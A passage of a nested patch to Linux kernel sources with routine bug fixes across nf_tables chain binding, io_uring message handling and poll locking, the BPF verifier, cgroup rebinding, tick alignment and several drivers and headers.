+-#define IO_REPARSE_TAG_LX_BLK	     0x80000026
+-
+-#define IO_REPARSE_TAG_LX_SYMLINK_LE	cpu_to_le32(0xA000001D)
+-#define IO_REPARSE_TAG_AF_UNIX_LE	cpu_to_le32(0x80000023)
+-#define IO_REPARSE_TAG_LX_FIFO_LE	cpu_to_le32(0x80000024)
+-#define IO_REPARSE_TAG_LX_CHR_LE	cpu_to_le32(0x80000025)
+-#define IO_REPARSE_TAG_LX_BLK_LE	cpu_to_le32(0x80000026)
+-
+-/* fsctl flags */
+-/* If Flags is set to this value, the request is an FSCTL not ioctl request */
+-#define SMB2_0_IOCTL_IS_FSCTL		0x00000001
+-#endif /* __SMBFSCTL_H */
+diff --git a/include/acpi/acpixf.h b/include/acpi/acpixf.h
+index 67c0b9e734b64..911bab2998e22 100644
+--- a/include/acpi/acpixf.h
++++ b/include/acpi/acpixf.h
+@@ -751,6 +751,7 @@ ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status
+ 						     acpi_event_status
+ 						     *event_status))
+ ACPI_HW_DEPENDENT_RETURN_UINT32(u32 acpi_dispatch_gpe(acpi_handle gpe_device, u32 gpe_number))
++ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status acpi_hw_disable_all_gpes(void))
+ ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status acpi_disable_all_gpes(void))
+ ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status acpi_enable_all_runtime_gpes(void))
+ ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status acpi_enable_all_wakeup_gpes(void))
+diff --git a/include/acpi/actbl3.h b/include/acpi/actbl3.h
+index 7b9571e00cc4b..832c6464f063f 100644
+--- a/include/acpi/actbl3.h
++++ b/include/acpi/actbl3.h
+@@ -443,6 +443,7 @@ struct acpi_tpm2_phy {
+ #define ACPI_TPM2_RESERVED10                        10
+ #define ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC       11	/* V1.2 Rev 8 */
+ #define ACPI_TPM2_RESERVED                          12
++#define ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON        13
+ 
+ /* Optional trailer appears after any start_method subtables */
+ 
+diff --git a/include/linux/gpio/driver.h b/include/linux/gpio/driver.h
+index 6aeea1071b1b2..78bcb1639999e 100644
+--- a/include/linux/gpio/driver.h
++++ b/include/linux/gpio/driver.h
+@@ -244,6 +244,14 @@ struct gpio_irq_chip {
+ 	 */
+ 	bool initialized;
+ 
++	/**
++	 * @domain_is_allocated_externally:
++	 *
++	 * True it the irq_domain was allocated outside of gpiolib, in which
++	 * case gpiolib won't free the irq_domain itself.
++	 */
++	bool domain_is_allocated_externally;
++
+ 	/**
+ 	 * @init_hw: optional routine to initialize hardware before
+ 	 * an IRQ chip will be added. This is quite useful when
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index fe990176e6ee9..9713f4d8f15f4 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -834,7 +834,7 @@ struct ata_port {
+ 
+ 	struct mutex		scsi_scan_mutex;
+ 	struct delayed_work	hotplug_task;
+-	struct work_struct	scsi_rescan_task;
++	struct delayed_work	scsi_rescan_task;
+ 
+ 	unsigned int		hsm_task_state;
+ 
+diff --git a/include/linux/regulator/pca9450.h b/include/linux/regulator/pca9450.h
+index 3c01c2bf84f53..505c908dbb817 100644
+--- a/include/linux/regulator/pca9450.h
++++ b/include/linux/regulator/pca9450.h
+@@ -196,11 +196,11 @@ enum {
+ 
+ /* PCA9450_REG_LDO3_VOLT bits */
+ #define LDO3_EN_MASK			0xC0
+-#define LDO3OUT_MASK			0x0F
++#define LDO3OUT_MASK			0x1F
+ 
+ /* PCA9450_REG_LDO4_VOLT bits */
+ #define LDO4_EN_MASK			0xC0
+-#define LDO4OUT_MASK			0x0F
++#define LDO4OUT_MASK			0x1F
+ 
+ /* PCA9450_REG_LDO5_VOLT bits */
+ #define LDO5L_EN_MASK			0xC0
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 22e96b7e1b44a..f3a37cacb32c3 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -467,7 +467,8 @@ struct nft_set_ops {
+ 	int				(*init)(const struct nft_set *set,
+ 						const struct nft_set_desc *desc,
+ 						const struct nlattr * const nla[]);
+-	void				(*destroy)(const struct nft_set *set);
++	void				(*destroy)(const struct nft_ctx *ctx,
++						   const struct nft_set *set);
+ 	void				(*gc_init)(const struct nft_set *set);
+ 
+ 	unsigned int			elemsize;
+@@ -804,6 +805,8 @@ int nft_set_elem_expr_clone(const struct nft_ctx *ctx, struct nft_set *set,
+ 			    struct nft_expr *expr_array[]);
+ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ 			  bool destroy_expr);
++void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
++				const struct nft_set *set, void *elem);
+ 
+ /**
+  *	struct nft_set_gc_batch_head - nf_tables set garbage collection batch
+@@ -895,6 +898,7 @@ struct nft_expr_type {
+ 
+ enum nft_trans_phase {
+ 	NFT_TRANS_PREPARE,
++	NFT_TRANS_PREPARE_ERROR,
+ 	NFT_TRANS_ABORT,
+ 	NFT_TRANS_COMMIT,
+ 	NFT_TRANS_RELEASE
+@@ -1002,7 +1006,10 @@ static inline struct nft_userdata *nft_userdata(const struct nft_rule *rule)
+ 	return (void *)&rule->data[rule->dlen];
+ }
+ 
+-void nf_tables_rule_release(const struct nft_ctx *ctx, struct nft_rule *rule);
++void nft_rule_expr_activate(const struct nft_ctx *ctx, struct nft_rule *rule);
++void nft_rule_expr_deactivate(const struct nft_ctx *ctx, struct nft_rule *rule,
++			      enum nft_trans_phase phase);
++void nf_tables_rule_destroy(const struct nft_ctx *ctx, struct nft_rule *rule);
+ 
+ static inline void nft_set_elem_update_expr(const struct nft_set_ext *ext,
+ 					    struct nft_regs *regs,
+@@ -1085,6 +1092,8 @@ int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
+ 			 const struct nft_set_iter *iter,
+ 			 struct nft_set_elem *elem);
+ int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set);
++int nf_tables_bind_chain(const struct nft_ctx *ctx, struct nft_chain *chain);
++void nf_tables_unbind_chain(const struct nft_ctx *ctx, struct nft_chain *chain);
+ 
+ enum nft_chain_types {
+ 	NFT_CHAIN_T_DEFAULT = 0,
+@@ -1121,11 +1130,17 @@ int nft_chain_validate_dependency(const struct nft_chain *chain,
+ int nft_chain_validate_hooks(const struct nft_chain *chain,
+                              unsigned int hook_flags);
+ 
++static inline bool nft_chain_binding(const struct nft_chain *chain)
++{
++	return chain->flags & NFT_CHAIN_BINDING;
++}
++
+ static inline bool nft_chain_is_bound(struct nft_chain *chain)
+ {
+ 	return (chain->flags & NFT_CHAIN_BINDING) && chain->bound;
+ }
+ 
++int nft_chain_add(struct nft_table *table, struct nft_chain *chain);
+ void nft_chain_del(struct nft_chain *chain);
+ void nf_tables_chain_destroy(struct nft_ctx *ctx);
+ 
+@@ -1543,6 +1558,7 @@ static inline void nft_set_elem_clear_busy(struct nft_set_ext *ext)
+  *	struct nft_trans - nf_tables object update in transaction
+  *
+  *	@list: used internally
++ *	@binding_list: list of objects with possible bindings
+  *	@msg_type: message type
+  *	@put_net: ctx->net needs to be put
+  *	@ctx: transaction context
+@@ -1550,6 +1566,7 @@ static inline void nft_set_elem_clear_busy(struct nft_set_ext *ext)
+  */
+ struct nft_trans {
+ 	struct list_head		list;
++	struct list_head		binding_list;
+ 	int				msg_type;
+ 	bool				put_net;
+ 	struct nft_ctx			ctx;
+@@ -1560,6 +1577,7 @@ struct nft_trans_rule {
+ 	struct nft_rule			*rule;
+ 	struct nft_flow_rule		*flow;
+ 	u32				rule_id;
++	bool				bound;
+ };
+ 
+ #define nft_trans_rule(trans)	\
+@@ -1568,6 +1586,8 @@ struct nft_trans_rule {
+ 	(((struct nft_trans_rule *)trans->data)->flow)
+ #define nft_trans_rule_id(trans)	\
+ 	(((struct nft_trans_rule *)trans->data)->rule_id)
++#define nft_trans_rule_bound(trans)	\
++	(((struct nft_trans_rule *)trans->data)->bound)
+ 
+ struct nft_trans_set {
+ 	struct nft_set			*set;
+@@ -1592,13 +1612,17 @@ struct nft_trans_set {
+ 	(((struct nft_trans_set *)trans->data)->gc_int)
+ 
+ struct nft_trans_chain {
++	struct nft_chain		*chain;
+ 	bool				update;
+ 	char				*name;
+ 	struct nft_stats __percpu	*stats;
+ 	u8				policy;
++	bool				bound;
+ 	u32				chain_id;
+ };
+ 
++#define nft_trans_chain(trans)	\
++	(((struct nft_trans_chain *)trans->data)->chain)
+ #define nft_trans_chain_update(trans)	\
+ 	(((struct nft_trans_chain *)trans->data)->update)
+ #define nft_trans_chain_name(trans)	\
+@@ -1607,6 +1631,8 @@ struct nft_trans_chain {
+ 	(((struct nft_trans_chain *)trans->data)->stats)
+ #define nft_trans_chain_policy(trans)	\
+ 	(((struct nft_trans_chain *)trans->data)->policy)
++#define nft_trans_chain_bound(trans)	\
++	(((struct nft_trans_chain *)trans->data)->bound)
+ #define nft_trans_chain_id(trans)	\
+ 	(((struct nft_trans_chain *)trans->data)->chain_id)
+ 
+@@ -1679,6 +1705,7 @@ static inline int nft_request_module(struct net *net, const char *fmt, ...) { re
+ struct nftables_pernet {
+ 	struct list_head	tables;
+ 	struct list_head	commit_list;
++	struct list_head	binding_list;
+ 	struct list_head	module_list;
+ 	struct list_head	notify_list;
+ 	struct mutex		commit_mutex;
+diff --git a/include/net/xfrm.h b/include/net/xfrm.h
+index dbc81f5eb5538..9ec6f2e92ad3a 100644
+--- a/include/net/xfrm.h
++++ b/include/net/xfrm.h
+@@ -1039,6 +1039,7 @@ struct xfrm_offload {
+ struct sec_path {
+ 	int			len;
+ 	int			olen;
++	int			verified_cnt;
+ 
+ 	struct xfrm_state	*xvec[XFRM_MAX_DEPTH];
+ 	struct xfrm_offload	ovec[XFRM_MAX_OFFLOAD_DEPTH];
+diff --git a/include/trace/events/writeback.h b/include/trace/events/writeback.h
+index 86b2a82da546a..54e353c9f919f 100644
+--- a/include/trace/events/writeback.h
++++ b/include/trace/events/writeback.h
+@@ -68,7 +68,7 @@ DECLARE_EVENT_CLASS(writeback_folio_template,
+ 		strscpy_pad(__entry->name,
+ 			    bdi_dev_name(mapping ? inode_to_bdi(mapping->host) :
+ 					 NULL), 32);
+-		__entry->ino = mapping ? mapping->host->i_ino : 0;
++		__entry->ino = (mapping && mapping->host) ? mapping->host->i_ino : 0;
+ 		__entry->index = folio->index;
+ 	),
+ 
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 05792a6899944..2b44126a876ef 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -190,7 +190,7 @@ static int io_sendmsg_copy_hdr(struct io_kiocb *req,
+ 	ret = sendmsg_copy_msghdr(&iomsg->msg, sr->umsg, sr->msg_flags,
+ 					&iomsg->free_iov);
+ 	/* save msg_control as sys_sendmsg() overwrites it */
+-	sr->msg_control = iomsg->msg.msg_control;
++	sr->msg_control = iomsg->msg.msg_control_user;
+ 	return ret;
+ }
+ 
+@@ -289,7 +289,7 @@ int io_sendmsg(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	if (req_has_async_data(req)) {
+ 		kmsg = req->async_data;
+-		kmsg->msg.msg_control = sr->msg_control;
++		kmsg->msg.msg_control_user = sr->msg_control;
+ 	} else {
+ 		ret = io_sendmsg_copy_hdr(req, &iomsg);
+ 		if (ret)
+@@ -313,6 +313,8 @@ int io_sendmsg(struct io_kiocb *req, unsigned int issue_flags)
+ 		if (ret == -EAGAIN && (issue_flags & IO_URING_F_NONBLOCK))
+ 			return io_setup_async_msg(req, kmsg, issue_flags);
+ 		if (ret > 0 && io_net_retry(sock, flags)) {
++			kmsg->msg.msg_controllen = 0;
++			kmsg->msg.msg_control = NULL;
+ 			sr->done_io += ret;
+ 			req->flags |= REQ_F_PARTIAL_IO;
+ 			return io_setup_async_msg(req, kmsg, issue_flags);
+@@ -779,16 +781,19 @@ retry_multishot:
+ 	flags = sr->msg_flags;
+ 	if (force_nonblock)
+ 		flags |= MSG_DONTWAIT;
+-	if (flags & MSG_WAITALL)
+-		min_ret = iov_iter_count(&kmsg->msg.msg_iter);
+ 
+ 	kmsg->msg.msg_get_inq = 1;
+-	if (req->flags & REQ_F_APOLL_MULTISHOT)
++	if (req->flags & REQ_F_APOLL_MULTISHOT) {
+ 		ret = io_recvmsg_multishot(sock, sr, kmsg, flags,
+ 					   &mshot_finished);
+-	else
++	} else {
++		/* disable partial retry for recvmsg with cmsg attached */
++		if (flags & MSG_WAITALL && !kmsg->msg.msg_controllen)
++			min_ret = iov_iter_count(&kmsg->msg.msg_iter);
++
+ 		ret = __sys_recvmsg_sock(sock, &kmsg->msg, sr->umsg,
+ 					 kmsg->uaddr, flags);
++	}
+ 
+ 	if (ret < min_ret) {
+ 		if (ret == -EAGAIN && force_nonblock) {
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index 4788073ec45d2..869e1d2a44139 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -993,8 +993,9 @@ int io_poll_remove(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct io_hash_bucket *bucket;
+ 	struct io_kiocb *preq;
+ 	int ret2, ret = 0;
+-	bool locked;
++	bool locked = true;
+ 
++	io_ring_submit_lock(ctx, issue_flags);
+ 	preq = io_poll_find(ctx, true, &cd, &ctx->cancel_table, &bucket);
+ 	ret2 = io_poll_disarm(preq);
+ 	if (bucket)
+@@ -1006,12 +1007,10 @@ int io_poll_remove(struct io_kiocb *req, unsigned int issue_flags)
+ 		goto out;
+ 	}
+ 
+-	io_ring_submit_lock(ctx, issue_flags);
+ 	preq = io_poll_find(ctx, true, &cd, &ctx->cancel_table_locked, &bucket);
+ 	ret2 = io_poll_disarm(preq);
+ 	if (bucket)
+ 		spin_unlock(&bucket->lock);
+-	io_ring_submit_unlock(ctx, issue_flags);
+ 	if (ret2) {
+ 		ret = ret2;
+ 		goto out;
+@@ -1035,7 +1034,7 @@ found:
+ 		if (poll_update->update_user_data)
+ 			preq->cqe.user_data = poll_update->new_user_data;
+ 
+-		ret2 = io_poll_add(preq, issue_flags);
++		ret2 = io_poll_add(preq, issue_flags & ~IO_URING_F_UNLOCKED);
+ 		/* successfully updated, don't complete poll request */
+ 		if (!ret2 || ret2 == -EIOCBQUEUED)
+ 			goto out;
+@@ -1043,9 +1042,9 @@ found:
+ 
+ 	req_set_fail(preq);
+ 	io_req_set_res(preq, -ECANCELED, 0);
+-	locked = !(issue_flags & IO_URING_F_UNLOCKED);
+ 	io_req_task_complete(preq, &locked);
+ out:
++	io_ring_submit_unlock(ctx, issue_flags);
+ 	if (ret < 0) {
+ 		req_set_fail(req);
+ 		return ret;
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index a8838a32f750e..8220caa488c54 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -735,13 +735,12 @@ static bool btf_name_offset_valid(const struct btf *btf, u32 offset)
+ 	return offset < btf->hdr.str_len;
+ }
+ 
+-static bool __btf_name_char_ok(char c, bool first, bool dot_ok)
++static bool __btf_name_char_ok(char c, bool first)
+ {
+ 	if ((first ? !isalpha(c) :
+ 		     !isalnum(c)) &&
+ 	    c != '_' &&
+-	    ((c == '.' && !dot_ok) ||
+-	      c != '.'))
++	    c != '.')
+ 		return false;
+ 	return true;
+ }
+@@ -758,20 +757,20 @@ static const char *btf_str_by_offset(const struct btf *btf, u32 offset)
+ 	return NULL;
+ }
+ 
+-static bool __btf_name_valid(const struct btf *btf, u32 offset, bool dot_ok)
++static bool __btf_name_valid(const struct btf *btf, u32 offset)
+ {
+ 	/* offset must be valid */
+ 	const char *src = btf_str_by_offset(btf, offset);
+ 	const char *src_limit;
+ 
+-	if (!__btf_name_char_ok(*src, true, dot_ok))
++	if (!__btf_name_char_ok(*src, true))
+ 		return false;
+ 
+ 	/* set a limit on identifier length */
+ 	src_limit = src + KSYM_NAME_LEN;
+ 	src++;
+ 	while (*src && src < src_limit) {
+-		if (!__btf_name_char_ok(*src, false, dot_ok))
++		if (!__btf_name_char_ok(*src, false))
+ 			return false;
+ 		src++;
+ 	}
+@@ -779,17 +778,14 @@ static bool __btf_name_valid(const struct btf *btf, u32 offset, bool dot_ok)
+ 	return !*src;
+ }
+ 
+-/* Only C-style identifier is permitted. This can be relaxed if
+- * necessary.
+- */
+ static bool btf_name_valid_identifier(const struct btf *btf, u32 offset)
+ {
+-	return __btf_name_valid(btf, offset, false);
++	return __btf_name_valid(btf, offset);
+ }
+ 
+ static bool btf_name_valid_section(const struct btf *btf, u32 offset)
+ {
+-	return __btf_name_valid(btf, offset, true);
++	return __btf_name_valid(btf, offset);
+ }
+ 
+ static const char *__btf_name_by_offset(const struct btf *btf, u32 offset)
+@@ -4044,7 +4040,7 @@ static s32 btf_var_check_meta(struct btf_verifier_env *env,
+ 	}
+ 
+ 	if (!t->name_off ||
+-	    !__btf_name_valid(env->btf, t->name_off, true)) {
++	    !__btf_name_valid(env->btf, t->name_off)) {
+ 		btf_verifier_log_type(env, t, "Invalid name");
+ 		return -EINVAL;
+ 	}
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 6c61dba26f4d9..8633ec4f92df3 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -3383,6 +3383,11 @@ static int bpf_prog_attach_check_attach_type(const struct bpf_prog *prog,
+ 		return prog->enforce_expected_attach_type &&
+ 			prog->expected_attach_type != attach_type ?
+ 			-EINVAL : 0;
++	case BPF_PROG_TYPE_KPROBE:
++		if (prog->expected_attach_type == BPF_TRACE_KPROBE_MULTI &&
++		    attach_type != BPF_TRACE_KPROBE_MULTI)
++			return -EINVAL;
++		return 0;
+ 	default:
+ 		return 0;
+ 	}
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 280e689517e10..49c6b5e0855cd 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -3061,6 +3061,11 @@ static void save_register_state(struct bpf_func_state *state,
+ 		scrub_spilled_slot(&state->stack[spi].slot_type[i - 1]);
+ }
+ 
++static bool is_bpf_st_mem(struct bpf_insn *insn)
++{
++	return BPF_CLASS(insn->code) == BPF_ST && BPF_MODE(insn->code) == BPF_MEM;
++}
++
+ /* check_stack_{read,write}_fixed_off functions track spill/fill of registers,
+  * stack boundary and alignment are checked in check_mem_access()
+  */
+@@ -3072,8 +3077,9 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ {
+ 	struct bpf_func_state *cur; /* state of the current function */
+ 	int i, slot = -off - 1, spi = slot / BPF_REG_SIZE, err;
+-	u32 dst_reg = env->prog->insnsi[insn_idx].dst_reg;
++	struct bpf_insn *insn = &env->prog->insnsi[insn_idx];
+ 	struct bpf_reg_state *reg = NULL;
++	u32 dst_reg = insn->dst_reg;
+ 
+ 	err = grow_stack_state(state, round_up(slot + 1, BPF_REG_SIZE));
+ 	if (err)
+@@ -3122,6 +3128,16 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 				return err;
+ 		}
+ 		save_register_state(state, spi, reg, size);
++		/* Break the relation on a narrowing spill. */
++		if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
++			state->stack[spi].spilled_ptr.id = 0;
++	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
++		   insn->imm != 0 && env->bpf_capable) {
++		struct bpf_reg_state fake_reg = {};
++
++		__mark_reg_known(&fake_reg, (u32)insn->imm);
++		fake_reg.type = SCALAR_VALUE;
++		save_register_state(state, spi, &fake_reg, size);
+ 	} else if (reg && is_spillable_regtype(reg->type)) {
+ 		/* register containing pointer is being spilled into stack */
+ 		if (size != BPF_REG_SIZE) {
+@@ -3156,7 +3172,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 			state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
+ 
+ 		/* when we zero initialize stack slots mark them as such */
+-		if (reg && register_is_null(reg)) {
++		if ((reg && register_is_null(reg)) ||
++		    (!reg && is_bpf_st_mem(insn) && insn->imm == 0)) {
+ 			/* backtracking doesn't work for STACK_ZERO yet. */
+ 			err = mark_chain_precision(env, value_regno);
+ 			if (err)
+@@ -13819,9 +13836,10 @@ static int jit_subprogs(struct bpf_verifier_env *env)
+ 	}
+ 
+ 	/* finally lock prog and jit images for all functions and
+-	 * populate kallsysm
++	 * populate kallsysm. Begin at the first subprogram, since
++	 * bpf_prog_load will add the kallsyms for the main program.
+ 	 */
+-	for (i = 0; i < env->subprog_cnt; i++) {
++	for (i = 1; i < env->subprog_cnt; i++) {
+ 		bpf_prog_lock_ro(func[i]);
+ 		bpf_prog_kallsyms_add(func[i]);
+ 	}
+@@ -13847,6 +13865,8 @@ static int jit_subprogs(struct bpf_verifier_env *env)
+ 	prog->jited = 1;
+ 	prog->bpf_func = func[0]->bpf_func;
+ 	prog->jited_len = func[0]->jited_len;
++	prog->aux->extable = func[0]->aux->extable;
++	prog->aux->num_exentries = func[0]->aux->num_exentries;
+ 	prog->aux->func = func;
+ 	prog->aux->func_cnt = env->subprog_cnt;
+ 	bpf_prog_jit_attempt_done(prog);
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 36c95626afecc..2380c4daef33d 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1782,7 +1782,7 @@ int rebind_subsystems(struct cgroup_root *dst_root, u16 ss_mask)
+ {
+ 	struct cgroup *dcgrp = &dst_root->cgrp;
+ 	struct cgroup_subsys *ss;
+-	int ssid, i, ret;
++	int ssid, ret;
+ 	u16 dfl_disable_ss_mask = 0;
+ 
+ 	lockdep_assert_held(&cgroup_mutex);
+@@ -1826,7 +1826,8 @@ int rebind_subsystems(struct cgroup_root *dst_root, u16 ss_mask)
+ 		struct cgroup_root *src_root = ss->root;
+ 		struct cgroup *scgrp = &src_root->cgrp;
+ 		struct cgroup_subsys_state *css = cgroup_css(scgrp, ss);
+-		struct css_set *cset;
++		struct css_set *cset, *cset_pos;
++		struct css_task_iter *it;
+ 
+ 		WARN_ON(!css || cgroup_css(dcgrp, ss));
+ 
+@@ -1844,9 +1845,22 @@ int rebind_subsystems(struct cgroup_root *dst_root, u16 ss_mask)
+ 		css->cgroup = dcgrp;
+ 
+ 		spin_lock_irq(&css_set_lock);
+-		hash_for_each(css_set_table, i, cset, hlist)
++		WARN_ON(!list_empty(&dcgrp->e_csets[ss->id]));
++		list_for_each_entry_safe(cset, cset_pos, &scgrp->e_csets[ss->id],
++					 e_cset_node[ss->id]) {
+ 			list_move_tail(&cset->e_cset_node[ss->id],
+ 				       &dcgrp->e_csets[ss->id]);
++			/*
++			 * all css_sets of scgrp together in same order to dcgrp,
++			 * patch in-flight iterators to preserve correct iteration.
++			 * since the iterator is always advanced right away and
++			 * finished when it->cset_pos meets it->cset_head, so only
++			 * update it->cset_head is enough here.
++			 */
++			list_for_each_entry(it, &cset->task_iters, iters_node)
++				if (it->cset_head == &scgrp->e_csets[ss->id])
++					it->cset_head = &dcgrp->e_csets[ss->id];
++		}
+ 		spin_unlock_irq(&css_set_lock);
+ 
+ 		if (ss->css_rstat_flush) {
+diff --git a/kernel/cgroup/legacy_freezer.c b/kernel/cgroup/legacy_freezer.c
+index 936473203a6b5..122dacb3a4439 100644
+--- a/kernel/cgroup/legacy_freezer.c
++++ b/kernel/cgroup/legacy_freezer.c
+@@ -108,16 +108,18 @@ static int freezer_css_online(struct cgroup_subsys_state *css)
+ 	struct freezer *freezer = css_freezer(css);
+ 	struct freezer *parent = parent_freezer(freezer);
+ 
++	cpus_read_lock();
+ 	mutex_lock(&freezer_mutex);
+ 
+ 	freezer->state |= CGROUP_FREEZER_ONLINE;
+ 
+ 	if (parent && (parent->state & CGROUP_FREEZING)) {
+ 		freezer->state |= CGROUP_FREEZING_PARENT | CGROUP_FROZEN;
+-		static_branch_inc(&freezer_active);
++		static_branch_inc_cpuslocked(&freezer_active);
+ 	}
+ 
+ 	mutex_unlock(&freezer_mutex);
++	cpus_read_unlock();
+ 	return 0;
+ }
+ 
+@@ -132,14 +134,16 @@ static void freezer_css_offline(struct cgroup_subsys_state *css)
+ {
+ 	struct freezer *freezer = css_freezer(css);
+ 
++	cpus_read_lock();
+ 	mutex_lock(&freezer_mutex);
+ 
+ 	if (freezer->state & CGROUP_FREEZING)
+-		static_branch_dec(&freezer_active);
++		static_branch_dec_cpuslocked(&freezer_active);
+ 
+ 	freezer->state = 0;
+ 
+ 	mutex_unlock(&freezer_mutex);
++	cpus_read_unlock();
+ }
+ 
+ static void freezer_css_free(struct cgroup_subsys_state *css)
+diff --git a/kernel/time/tick-common.c b/kernel/time/tick-common.c
+index 65b8658da829e..e9138cd7a0f52 100644
+--- a/kernel/time/tick-common.c
++++ b/kernel/time/tick-common.c
+@@ -218,19 +218,8 @@ static void tick_setup_device(struct tick_device *td,
+ 		 * this cpu:
+ 		 */
+ 		if (tick_do_timer_cpu == TICK_DO_TIMER_BOOT) {
+-			ktime_t next_p;
+-			u32 rem;
+-
+ 			tick_do_timer_cpu = cpu;
+-
+-			next_p = ktime_get();
+-			div_u64_rem(next_p, TICK_NSEC, &rem);
+-			if (rem) {
+-				next_p -= rem;
+-				next_p += TICK_NSEC;
+-			}
+-
+-			tick_next_period = next_p;
++			tick_next_period = ktime_get();
+ #ifdef CONFIG_NO_HZ_FULL
+ 			/*
+ 			 * The boot CPU may be nohz_full, in which case set
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index a46506f7ec6d0..d6fb6a676bbbb 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -161,8 +161,19 @@ static ktime_t tick_init_jiffy_update(void)
+ 	raw_spin_lock(&jiffies_lock);
+ 	write_seqcount_begin(&jiffies_seq);
+ 	/* Did we start the jiffies update yet ? */
+-	if (last_jiffies_update == 0)
++	if (last_jiffies_update == 0) {
++		u32 rem;
++
++		/*
++		 * Ensure that the tick is aligned to a multiple of
++		 * TICK_NSEC.
++		 */
++		div_u64_rem(tick_next_period, TICK_NSEC, &rem);
++		if (rem)
++			tick_next_period += TICK_NSEC - rem;
++
+ 		last_jiffies_update = tick_next_period;
++	}
+ 	period = last_jiffies_update;
+ 	write_seqcount_end(&jiffies_seq);
+ 	raw_spin_unlock(&jiffies_lock);
+diff --git a/mm/maccess.c b/mm/maccess.c
+index 074f6b086671e..518a25667323e 100644
+--- a/mm/maccess.c
++++ b/mm/maccess.c
+@@ -5,6 +5,7 @@
+ #include <linux/export.h>
+ #include <linux/mm.h>
+ #include <linux/uaccess.h>
++#include <asm/tlb.h>
+ 
+ bool __weak copy_from_kernel_nofault_allowed(const void *unsafe_src,
+ 		size_t size)
+@@ -113,11 +114,16 @@ Efault:
+ long copy_from_user_nofault(void *dst, const void __user *src, size_t size)
+ {
+ 	long ret = -EFAULT;
+-	if (access_ok(src, size)) {
+-		pagefault_disable();
+-		ret = __copy_from_user_inatomic(dst, src, size);
+-		pagefault_enable();
+-	}
++
++	if (!__access_ok(src, size))
++		return ret;
++
++	if (!nmi_uaccess_okay())
++		return ret;
++
++	pagefault_disable();
++	ret = __copy_from_user_inatomic(dst, src, size);
++	pagefault_enable();
+ 
+ 	if (ret)
+ 		return -EFAULT;
+diff --git a/mm/memfd.c b/mm/memfd.c
+index 08f5f8304746f..b0104b49bf82c 100644
+--- a/mm/memfd.c
++++ b/mm/memfd.c
+@@ -328,7 +328,8 @@ SYSCALL_DEFINE2(memfd_create,
+ 
+ 	if (flags & MFD_ALLOW_SEALING) {
+ 		file_seals = memfd_file_seals_ptr(file);
+-		*file_seals &= ~F_SEAL_SEAL;
++		if (file_seals)
++			*file_seals &= ~F_SEAL_SEAL;
+ 	}
+ 
+ 	fd_install(fd, file);
+diff --git a/mm/usercopy.c b/mm/usercopy.c
+index c1ee15a986338..434fce112acb9 100644
+--- a/mm/usercopy.c
++++ b/mm/usercopy.c
+@@ -172,7 +172,7 @@ static inline void check_heap_object(const void *ptr, unsigned long n,
+ 		return;
+ 	}
+ 
+-	if (is_vmalloc_addr(ptr)) {
++	if (is_vmalloc_addr(ptr) && !pagefault_disabled()) {
+ 		struct vmap_area *area = find_vmap_area(addr);
+ 
+ 		if (!area)
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 83f590d8d0850..b021cb9c95ef3 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -1355,12 +1355,6 @@ set_sndbuf:
+ 		__sock_set_mark(sk, val);
+ 		break;
+ 	case SO_RCVMARK:
+-		if (!sockopt_ns_capable(sock_net(sk)->user_ns, CAP_NET_RAW) &&
+-		    !sockopt_ns_capable(sock_net(sk)->user_ns, CAP_NET_ADMIN)) {
+-			ret = -EPERM;
+-			break;
+-		}
+-
+ 		sock_valbool_flag(sk, SOCK_RCVMARK, valbool);
+ 		break;
+ 
+diff --git a/net/ipv4/esp4_offload.c b/net/ipv4/esp4_offload.c
+index 3969fa805679c..ee848be59e65a 100644
+--- a/net/ipv4/esp4_offload.c
++++ b/net/ipv4/esp4_offload.c
+@@ -340,6 +340,9 @@ static int esp_xmit(struct xfrm_state *x, struct sk_buff *skb,  netdev_features_
+ 
+ 	secpath_reset(skb);
+ 
++	if (skb_needs_linearize(skb, skb->dev->features) &&
++	    __skb_linearize(skb))
++		return -ENOMEM;
+ 	return 0;
+ }
+ 
